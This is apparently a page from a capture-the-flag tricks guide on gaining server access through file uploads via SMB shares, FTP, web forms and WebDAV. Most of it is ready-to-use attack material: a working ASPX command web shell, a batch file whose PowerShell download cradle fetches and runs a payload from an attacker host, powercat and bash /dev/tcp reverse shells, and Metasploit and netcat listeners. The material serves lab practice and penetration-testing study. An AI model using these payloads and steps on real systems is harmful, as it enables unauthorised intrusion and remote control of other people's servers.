> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/web-exploit/initial-access-web-exploit-file-upload.md).

# File Upload

## ASP.NET Reverse Shell Via Writable Share

Extended Content:\
Identify a writable SMB share that is also served by a web server (likely IIS). This often involves initial reconnaissance like SMB enumeration (potentially via a null session) to find writable shares and mapping those to known web roots. Tools like `smbclient` can be used for enumeration and connecting to shares, for example:

```bash
smbclient -L //TARGET_IP/ -N
smbclient //TARGET_IP/share -N
```

The `rpcclient` tool can also be used with a null session for reconnaissance:

```bash
rpcclient -U "" -N TARGET_IP
```

Alternatively, `smbmap` can quickly identify accessible shares and their permissions:

```bash
smbmap -H TARGET_IP
```

The goal is to check if the share is writable for unauthenticated users. If a writable SMB share is found which is hosted on a web server, this can be used to achieve Remote Code Execution.

Craft an ASP.NET web shell payload, such as a reverse shell. Upload this `.aspx` file to the identified writable SMB share. Using `smbclient`, this can be done with the `put` command after connecting to the share:

```bash
put webshell.aspx webshell.aspx
```

Access the uploaded file via the web server's corresponding URL (e.g., `http://target_ip/path/to/share/shell.aspx`) to trigger execution of the shell code on the server. The URL structure would typically follow the pattern `http://<TARGET IP>/<SHARE NAME>/webshell.aspx`. Ensure the web server has handler mappings configured for ASPX files in the target directory for this to succeed.

For IIS, handler mappings define how the web server processes requests for specific file types. For ASP.NET pages (`.aspx`), a handler is required to pass the request to the ASP.NET runtime. A typical handler mapping configuration in a `web.config` file might look like this:

```xml
<configuration>
   <system.webServer>
      <handlers>
         <add name="PageHandlerFactory-ISAPI-2.0" path="*.aspx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />
      </handlers>
   </system.webServer>
</configuration>
```

For integrated mode, a handler mapping like the following is common:

```xml
<add name="ASP.NET-v4.0" path="*.aspx" verb="GET,HEAD,POST,DEBUG" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" type="System.Web.UI.PageHandlerFactory" />
```

If the web shell payload is a reverse shell, a listener needs to be set up on the attacker machine before accessing the `.aspx` file. Using Metasploit, this can be done with the `multi/handler` module:

```bash
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Your IP>
set LPORT <Your Port>
run
```

Once the listener is active, accessing the uploaded `.aspx` file via the web browser will trigger the payload execution and establish the reverse shell connection.

***

## File Upload Cmd Execution Powershell Shell

Leveraging a file upload vulnerability that allows execution of batch files (`.bat`), you can craft a command to fetch and run a Powershell reverse shell. This method involves using a batch file to trigger a PowerShell command that downloads and executes a script directly from a web server, often referred to as a download cradle.

First, create a batch file that contains the PowerShell command. This command uses `powershell -c` to execute a command string. The core of the command is `IEX` (Invoke-Expression), which runs commands or expressions on the local computer, combined with `(New-Object System.Net.Webclient).DownloadString('http://IP_ADDRESS/payload.ps1')`. The `DownloadString` method fetches the content of the specified URL as a string. `Invoke-Expression` then executes this downloaded string as a PowerShell script.

```bash
echo "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://IP_ADDRESS/payload.ps1')" > rev.bat
```

Next, create your Powershell reverse shell payload. Powercat, a Netcat alternative written in Powershell, is a common choice for its features and potential AV evasion. This command generates the `payload.ps1` file. The parameters `-c` sets client mode for connecting to a listener, `-p` specifies the port, `-e` indicates executing a command on the target (here, `cmd`), and `-g` is used to generate a script file instead of running the command directly.

```bash
powercat -c IP_ADDRESS -p 443 -e cmd -g > payload.ps1
```

Set up a netcat listener on your machine (`IP_ADDRESS`) on the specified port (e.g., 443) to catch the incoming shell. `rlwrap` is useful for better shell interaction when setting up netcat listeners. The command uses `-l` for listen, `-v` for verbose, `-n` for numeric-only IP addresses (no DNS lookup), and `-p` for the port number.

```bash
rlwrap nc -lvnp 443
```

Finally, upload the created `rev.bat` file via the web form. Upon execution on the target, it will download `payload.ps1` and run it, connecting back to your listener. Ensure you are hosting `payload.ps1` on a web server accessible to the target.

***

## Upload PHP Reverse Shell via FTP

First, connect to the target FTP server and log in with appropriate credentials. Ensure you have write access to a directory served by the web server (e.g., `/var/www/html`, `/usr/share/httpd`). Upload your prepared PHP reverse shell script (remember to update the LHOST and LPORT within the script).

```bash
ftp <target-ip>
# login with credentials
ftp> put php-reverse-shell.php
```

On your attacker machine, set up a netcat listener. On the attacker machine, set up a netcat listener using the command:

```bash
nc -nvlp <LPORT>
```

Finally, trigger the reverse shell by accessing the uploaded script through a web browser or using the `curl` command.

```
http://<target-ip>/php-reverse-shell.php
```

***

## Upload Webshell Via Ftp

Connect to the target FTP server, typically using credentials obtained through other means (e.g., `nancy` in this case).

```bash
ftp target.ine.local
```

Before uploading, ensure you have a webshell file ready. For an ASP.NET target, an `.aspx` webshell is suitable. A simple webshell can execute commands passed via a URL parameter. An example of such a shell (`shell.aspx`) might look like this:

```csharp
<%@ Page Language="C#" Debug="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="C#" Runat="server">
void Page_Load(object sender, EventArgs e)
{
}
</script>
<%
    if (Request.QueryString["cmd"] != null)
    {
        Process p = new Process();
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"];
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = true;
        p.Start();
        StreamReader reader = p.StandardOutput;
        string output = reader.ReadToEnd();
        Response.Write(output);
    }
%>
```

This code takes a command from the `cmd` query string parameter, executes it using `cmd.exe`, and prints the output to the response.

Log in with the discovered username and password. Once authenticated and in a directory writeable by the web server, upload your generated webshell file (e.g., `shell.aspx`).

```bash
put shell.aspx
```

After the file is uploaded, identify the web-accessible path corresponding to the FTP directory used. Accessing this URL via a web browser or tool will execute the webshell. To execute a specific command, append it as a query string parameter. For instance, accessing `http://target.ine.local/shell.aspx?cmd=whoami` would execute the `whoami` command on the server and display the output.

***

## Web Shell Upload for Reverse Shell

Exploiting vulnerable file upload features to gain Remote Code Execution (RCE) often involves uploading a script file (like PHP) containing a payload. A common payload is a reverse shell, designed to connect back from the compromised server to the attacker's machine, providing a command-line interface.

Prepare a file (e.g., `shell.php`) with initial content like this simple example:

```php
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/<YOUR IP>/<PORT> 0>&1'"); ?>
```

Alternatively, more sophisticated PHP reverse shells exist. These scripts often include options for setting the callback IP address and port directly within the file itself. A common structure for such a script might begin by defining these parameters:

```php
<?php
// Connect back to attacker machine
$ip = '<YOUR IP>';  // Change this to the attacker's IP
$port = <PORT>;      // Change this to the attacker's port

// ... rest of the shell code using $ip and $port ...
?>
```

These more detailed scripts typically handle the socket connection and process execution (`/bin/sh` or `/bin/bash`) using PHP's built-in functions like `socket_create`, `socket_connect`, and `proc_open` to establish a stable shell session.

Upload this malicious file through the target's file upload mechanism. Once uploaded, you need to set up a listener on your attacking machine before triggering the execution of the uploaded file. A common tool for this is Netcat.

Set up a Netcat listener on your machine on the specified `<PORT>`:

```bash
nc -lvnp <PORT>
```

The flags here typically mean: `l` (listen), `v` (verbose output), `n` (numeric-only IP addresses, no DNS lookups), and `p` (specify the port).

After the listener is active, access the URL where the uploaded file is accessible on the target server (e.g., `/uploads/shell.php`) using your web browser or a command-line tool like `curl`. Accessing the script will execute the payload and initiate the connection back to your Netcat listener, establishing the reverse shell.

***

## WebDAV File Upload and Reverse Shell

Identify a writable WebDAV share, often found via misconfigurations or default credentials. Tools like `davtest` can be used to confirm write capabilities by testing various HTTP methods. A successful test will typically show that methods like PUT, COPY, MOVE, DELETE, and MKCOL are allowed, indicating file upload (via PUT or MOVE) is possible.

For example, `davtest` can test the URL to check allowed methods:

```bash
davtest -url http://10.10.62.38/webdav/
```

The output will list the supported methods.

Once write access is confirmed, upload a reverse shell payload (e.g., a PHP shell). This can be done with `davtest` or other tools.

Authenticate if necessary (as shown below with `wampp:xampp`).

```bash
davtest -auth wampp:xampp -url http://10.10.62.38/webdav/ -uploadfile ./shell.php -uploadloc /shell.php
```

Alternatively, the `cadaver` client can be used for interactive WebDAV access and file upload. Connect to the WebDAV URL:

```bash
cadaver http://10.10.62.38/webdav/
```

Once connected, you can list directory contents with `ls` and upload a local file (`shell.php`) to the remote server using the `put` command:

```
dav:/webdav/> put shell.php
```

Another common method is using `curl` with the PUT method to upload the file directly:

```bash
curl -X PUT --data-binary @shell.php http://10.10.62.38/webdav/shell.php
```

This command sends the content of `shell.php` using the PUT method to the specified URL.

After uploading, set up your netcat listener and trigger the shell by navigating to the uploaded file's URL in a web browser (e.g., `http://target_ip/webdav/shell.php`).
